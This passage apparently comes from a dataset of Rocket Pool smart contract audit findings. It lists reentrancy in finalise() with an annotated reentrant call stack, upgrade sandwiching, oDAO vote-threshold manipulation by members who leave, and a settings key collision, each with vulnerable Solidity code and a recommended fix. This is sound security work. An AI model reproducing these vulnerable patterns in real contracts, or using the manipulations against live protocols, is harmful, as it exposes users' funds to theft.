require(\\_newWithdrawalAddress != address(0x0), ""Invalid withdrawal address"");\\n // Confirm the transaction is from the node's current withdrawal address\\n address withdrawalAddress = getNodeWithdrawalAddress(\\_nodeAddress);\\n require(withdrawalAddress == msg.sender, ""Only a tx from a node's withdrawal address can update it"");\\n // Update immediately if confirmed\\n if (\\_confirm) {\\n updateWithdrawalAddress(\\_nodeAddress, \\_newWithdrawalAddress);\\n }\\n // Set pending withdrawal address if not confirmed\\n else {\\n pendingWithdrawalAddresses[\\_nodeAddress] = \\_newWithdrawalAddress;\\n }\\n}\\n```\\n","Resolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by implementing a custom reentrancy guard via a new state variable `lock` that is appended to the end of the storage layout. The reentrancy guard is functionally equivalent to the OpenZeppelin implementation. The method was not refactored to give user funds priority over the node share. Additionally, the client provided the following statement:\\nWe acknowledge this as a critical issue and have solved with a reentrancy guard.\\nWe followed OpenZeppelin's design for a reentrancy guard. We were unable to use it directly as it is hardcoded to use storage slot 0 and because we already have deployment of this delegate in the wild already using storage slot 0 for another purpose, we had to append it to the end of the existing storage layout.\\nAdd a reentrancy guard to functions that interact with untrusted contracts. Adhere to the checks-effects pattern and send user funds to the ‘trusted' RETH contract first. Only then send funds to the node's withdrawal address.",,"```\\n/// @notice Distributes the balance of this contract to its owners\\nfunction distribute() override external {\\n // Calculate node share\\n uint256 nodeShare = getNodeShare();\\n // Transfer node share\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n (bool success,) = withdrawalAddress.call{value : nodeShare}("""");\\n require(success);\\n // Transfer user share\\n uint256 userShare = address(this).balance;\\n address rocketTokenRETH = rocketStorage.getAddress(rocketTokenRETHKey);\\n payable(rocketTokenRETH).transfer(userShare);\\n // Emit event\\n emit FeesDistributed(nodeAddress, userShare, nodeShare, block.timestamp);\\n}\\n```\\n" +RocketMinipoolDelegateOld - Node operator may reenter finalise() to manipulate accounting,high,"In the old Minipool delegate contract, a node operator may call the `finalise()` function to finalize a Minipool. As part of this process, a call to `_refund()` may be performed if there is a node refund balance to be transferred. This will send an amount of `nodeRefundBalance` in ETH to the `nodeWithdrawalAddress` via a low-level call, handing over control flow to an - in terms of the system - untrusted external account that this node operator controls. The node operator, therefore, is granted to opportunity to call back into `finalise()`, which is not protected against reentrancy and violates the checks-effects-interactions pattern (finalised = true is only set at the very end), to manipulate the following system settings:\\nnode.minipools.finalised.count: NodeAddress finalised count increased twice instead\\nminipools.finalised.count: global finalised count increased twice\\n`eth.matched.node.amount` - NodeAddress eth matched amount potentially reduced too many times; has an impact on `getNodeETHCollateralisationRatio -> GetNodeShare`, `getNodeETHProvided -> getNodeEffectiveRPLStake` and `getNodeETHProvided->getNodeMaximumRPLStake->withdrawRPL` and is the limiting factor when withdrawing RPL to ensure the pools stay collateralized.\\nNote: `RocketMinipoolDelegateOld` is assumed to be the currently deployed MiniPool implementation. Users may upgrade from this delegate to the new version and can roll back at any time and re-upgrade, even within the same transaction (see issue 5.3 ).\\nThe following is an annotated call stack from a node operator calling `minipool.finalise()` reentering `finalise()` once more on their Minipool:\\n```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n\\n```\\n// Called by node operator to finalise the pool and unlock their RPL stake\\nfunction finalise() external override onlyInitialised onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) {\\n // Can only call if withdrawable and can only be called once\\n require(status == MinipoolStatus.Withdrawable, ""Minipool must be withdrawable"");\\n // Node operator cannot finalise the pool unless distributeBalance has been called\\n require(withdrawalBlock > 0, ""Minipool balance must have been distributed at least once"");\\n // Finalise the pool\\n \\_finalise();\\n}\\n```\\n\\n`_refund()` handing over control flow to `nodeWithdrawalAddress`\\n```\\n// Perform any slashings, refunds, and unlock NO's stake\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n // Can only finalise the pool once\\n require(!finalised, ""Minipool has already been finalised"");\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n // Send any left over ETH to rETH contract\\n if (address(this).balance > 0) {\\n // Send user amount to rETH contract\\n payable(rocketTokenRETH).transfer(address(this).balance);\\n }\\n // Trigger a deposit of excess collateral from rETH contract to deposit pool\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral();\\n // Unlock node operator's RPL\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress);\\n // Update unbonded validator count if minipool is unbonded\\n if (depositType == MinipoolDeposit.Empty) {\\n RocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress);\\n }\\n // Set finalised flag\\n finalised = true;\\n}\\n```\\n\\n```\\nfunction \\_refund() private {\\n // Update refund balance\\n uint256 refundAmount = nodeRefundBalance;\\n nodeRefundBalance = 0;\\n // Get node withdrawal address\\n address nodeWithdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer refund amount\\n (bool success,) = nodeWithdrawalAddress.call{value : refundAmount}("""");\\n require(success, ""ETH refund amount was not successfully transferred to node operator"");\\n // Emit ether withdrawn event\\n emit EtherWithdrawn(nodeWithdrawalAddress, refundAmount, block.timestamp);\\n}\\n```\\n\\nMethods adjusting system settings called twice:\\n```\\n// Increments \\_nodeAddress' number of minipools that have been finalised\\nfunction incrementNodeFinalisedMinipoolCount(address \\_nodeAddress) override external onlyLatestContract(""rocketMinipoolManager"", address(this)) onlyRegisteredMinipool(msg.sender) {\\n // Update the node specific count\\n addUint(keccak256(abi.encodePacked(""node.minipools.finalised.count"", \\_nodeAddress)), 1);\\n // Update the total count\\n addUint(keccak256(bytes(""minipools.finalised.count"")), 1);\\n}\\n```\\n\\n```\\n}\\nfunction decrementMemberUnbondedValidatorCount(address \\_nodeAddress) override external onlyLatestContract(""rocketDAONodeTrusted"", address(this)) onlyRegisteredMinipool(msg.sender) {\\n subUint(keccak256(abi.encodePacked(daoNameSpace, ""member.validator.unbonded.count"", \\_nodeAddress)), 1);\\n}\\n```\\n","We recommend setting the `finalised = true` flag immediately after checking for it. Additionally, the function flow should adhere to the checks-effects-interactions pattern whenever possible. We recommend adding generic reentrancy protection whenever the control flow is handed to an untrusted entity.",,"```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n" +RocketMinipoolDelegate - Sandwiching of Minipool calls can have unintended side effects,high,"The `RocketMinipoolBase` contract exposes the functions `delegateUpgrade` and `delegateRollback`, allowing the minipool owner to switch between delegate implementations. While giving the minipool owner a chance to roll back potentially malfunctioning upgrades, the fact that upgrades and rollback are instantaneous also gives them a chance to alternate between executing old and new code (e.g. by utilizing callbacks) and sandwich user calls to the minipool.\\nAssuming the latest minipool delegate implementation, any user can call `RocketMinipoolDelegate.slash`, which slashes the node operator's RPL balance if a slashing has been recorded on their validator. To mark the minipool as having been `slashed`, the `slashed` contract variable is set to `true`. A minipool owner can avoid this flag from being set By sandwiching the user calls:\\nIn detail, the new slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nCompared to the old slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n}\\n```\\n\\nWhile the bypass of `slashed` being set is a benign example, the effects of this issue, in general, could result in a significant disruption of minipool operations and potentially affect the system's funds. The impact highly depends on the changes introduced by future minipool upgrades.","We recommend limiting upgrades and rollbacks to prevent minipool owners from switching implementations with an immediate effect. A time lock can fulfill this purpose when a minipool owner announces an upgrade to be done at a specific block. A warning can precede user-made calls that an upgrade is pending, and their interaction can have unintended side effects.",,"```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n" +RocketDAONodeTrustedActions - No way to access ETH provided by non-member votes Acknowledged,high,"DAO members can challenge nodes to prove liveliness for free. Non-DAO members must provide `members.challenge.cost = 1 eth` to start a challenge. However, the provided challenge cost is locked within the contract instead of being returned or recycled as system collateral.\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedActions"", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(""rocketDAONodeTrustedSettingsMembers""));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), ""Non DAO members must pay ETH to challenge a members node"");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, ""You cannot challenge yourself"");\\n // Is this member already being challenged?\\n```\\n","We recommend locking the ETH inside the contract during the challenge process. If a challenge is refuted, we recommend feeding the locked value back into the system as protocol collateral. If the challenge succeeds and the node is kicked, it is assumed that the challenger will be repaid the amount they had to lock up to prove non-liveliness.",,"```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedActions"", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(""rocketDAONodeTrustedSettingsMembers""));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), ""Non DAO members must pay ETH to challenge a members node"");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, ""You cannot challenge yourself"");\\n // Is this member already being challenged?\\n```\\n" +Multiple checks-effects violations,high,"Throughout the system, there are various violations of the checks-effects-interactions pattern where the contract state is updated after an external call. Since large parts of the Rocket Pool system's smart contracts are not guarded against reentrancy, the external call's recipient may reenter and potentially perform malicious actions that can impact the overall accounting and, thus, system funds.\\n`distributeToOwner()` sends the contract's balance to the node or the withdrawal address before clearing the internal accounting:\\n```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, ""The minipool can only be closed while dissolved"");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), ""Minipool already closed"");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n\\nThe withdrawal block should be set before any other contracts are called:\\n```\\n// Save block to prevent multiple withdrawals within a few blocks\\nwithdrawalBlock = block.number;\\n```\\n\\nThe `slashed` state should be set before any external calls are made:\\n```\\n/// @dev Slash node operator's RPL balance based on nodeSlashBalance\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nIn the bond reducer, the accounting values should be cleared before any external calls are made:\\n```\\n// Get desired to amount\\nuint256 newBondAmount = getUint(keccak256(abi.encodePacked(""minipool.bond.reduction.value"", msg.sender)));\\nrequire(rocketNodeDeposit.isValidDepositAmount(newBondAmount), ""Invalid bond amount"");\\n// Calculate difference\\nuint256 existingBondAmount = minipool.getNodeDepositBalance();\\nuint256 delta = existingBondAmount.sub(newBondAmount);\\n// Get node address\\naddress nodeAddress = minipool.getNodeAddress();\\n// Increase ETH matched or revert if exceeds limit based on current RPL stake\\nrocketNodeDeposit.increaseEthMatched(nodeAddress, delta);\\n// Increase node operator's deposit credit\\nrocketNodeDeposit.increaseDepositCreditBalance(nodeAddress, delta);\\n// Clean up state\\ndeleteUint(keccak256(abi.encodePacked(""minipool.bond.reduction.time"", msg.sender)));\\ndeleteUint(keccak256(abi.encodePacked(""minipool.bond.reduction.value"", msg.sender)));\\n```\\n\\nThe counter for reward snapshot execution should be incremented before RPL gets minted:\\n```\\n// Execute inflation if required\\nrplContract.inflationMintTokens();\\n// Increment the reward index and update the claim interval timestamp\\nincrementRewardIndex();\\n```\\n","We recommend following the checks-effects-interactions pattern and adjusting any contract state variables before making external calls. With the upgradeable nature of the system, we also recommend strictly adhering to this practice when all external calls are being made to trusted network contracts.",,"```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, ""The minipool can only be closed while dissolved"");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), ""Minipool already closed"");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n" +RocketMinipoolDelegate - Redundant refund() call on forced finalization,medium,"The `RocketMinipoolDelegate.refund` function will force finalization if a user previously distributed the pool. However, `_finalise` already calls `_refund()` if there is a node refund balance to transfer, making the additional call to `_refund()` in `refund()` obsolete.\\n```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, ""No amount of the node deposit is available for refund"");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n\\n```\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n // Can only finalise the pool once\\n require(!finalised, ""Minipool has already been finalised"");\\n // Set finalised flag\\n finalised = true;\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n \\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n```\\n",Resolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by refactoring `refund()` to avoid a double invocation of `_refund()` in the `_finalise()` codepath.\\nFixed per the recommendation. Thanks.\\nWe recommend refactoring the if condition to contain `_refund()` in the else branch.,,"```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, ""No amount of the node deposit is available for refund"");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n" +Sparse documentation and accounting complexity Acknowledged,medium,"Throughout the project, inline documentation is either sparse or missing altogether. Furthermore, few technical documents about the system's design rationale are available. The recent releases' increased complexity makes it significantly harder to trace the flow of funds through the system as components change semantics, are split into separate contracts, etc.\\nIt is essential that documentation not only outlines what is being done but also why and what a function's role in the system's “bigger picture” is. Many comments in the code base fail to fulfill this requirement and are thus redundant, e.g.\\n```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, ""Refund balance not zero"");\\n```\\n\\n```\\n// Remove from vacant set\\nrocketMinipoolManager.removeVacantMinipool();\\n```\\n\\n```\\nif (ownerCalling) {\\n // Finalise the minipool if the owner is calling\\n \\_finalise();\\n```\\n\\nThe increased complexity and lack of documentation can increase the likelihood of developer error. Furthermore, the time spent maintaining the code and introducing new developers to the code base will drastically increase. This effect can be especially problematic in the system's accounting of funds as the various stages of a Minipool imply different flows of funds and interactions with external dependencies. Documentation should explain the rationale behind specific hardcoded values, such as the magic `8 ether` boundary for withdrawal detection. An example of a lack of documentation and distribution across components is the calculation and influence of `ethMatched` as it plays a role in:\\nthe minipool bond reducer,\\nthe node deposit contract,\\nthe node manager, and\\nthe node staking contract.","As the Rocketpool system grows in complexity, we highly recommend significantly increasing the number of inline comments and general technical documentation and exploring ways to centralize the system's accounting further to provide a clear picture of which funds move where and at what point in time. Where the flow of funds is obscured because multiple components or multi-step processes are involved, we recommend adding extensive inline documentation to give context.",,"```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, ""Refund balance not zero"");\\n```\\n" +RocketNodeDistributor - Missing extcodesize check in dynamic proxy Won't Fix,medium,"`RocketNodeDistributor` dynamically retrieves the currently set delegate from the centralized `RocketStorage` contract. The target contract (delegate) is resolved inside the fallback function. It may return `address(0)`. `rocketStorage.getAddress()` does not enforce that the requested settings key exists, which may lead to `RocketNodeDistributor` delegate-calling into `address(0)`, which returns no error. This might stay undetected when calling `RocketNodeDistributorDelegate.distribute()` as the method does not return a value, which is consistent with calling a target address with no code.\\n```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n\\n```\\nfunction getAddress(bytes32 \\_key) override external view returns (address r) {\\n return addressStorage[\\_key];\\n}\\n```\\n","Before delegate-calling into the target contract, check if it exists.\\n```\\nassembly {\\n codeSize := extcodesize(\\_target)\\n}\\nrequire(codeSize > 0);\\n```\\n",,"```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n" +Kicked oDAO members' votes taken into account Acknowledged,medium,"oDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(""rocketNetworkPrices"", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(""minipool.bond.reduction.vote.count"", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(""rocketNetworkPenalties"", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(""rocketDAOProtocolSettingsNetwork""));\\n // Get submission keys\\n```\\n",Track oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.,,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n" +RocketDAOProtocolSettingsRewards - settings key collission Acknowledged,medium,"A malicious user may craft a DAO protocol proposal to set a rewards claimer for a specific contract, thus overwriting another contract's settings. This issue arises due to lax requirements when choosing safe settings keys.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n\\nThe method updates the rewards claimer for a specific contract by writing to the following two setting keys:\\n`settingNameSpace.rewards.claimsgroup.amount<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`\\nDue to the way the settings hierarchy was chosen in this case, a malicious proposal might define a `<_contractName> = .updated.time` that overwrites the settings of a different contract with an invalid value.\\nNote that the issue of delimiter consistency is also discussed in issue 5.12.\\nThe severity rating is based on the fact that this should be detectable by DAO members. However, following a defense-in-depth approach means that such collisions should be avoided wherever possible.","We recommend enforcing a unique prefix and delimiter when concatenating user-provided input to setting keys. In this specific case, the settings could be renamed as follows:\\n`settingNameSpace.rewards.claimsgroup.amount.value<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`",,"```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", 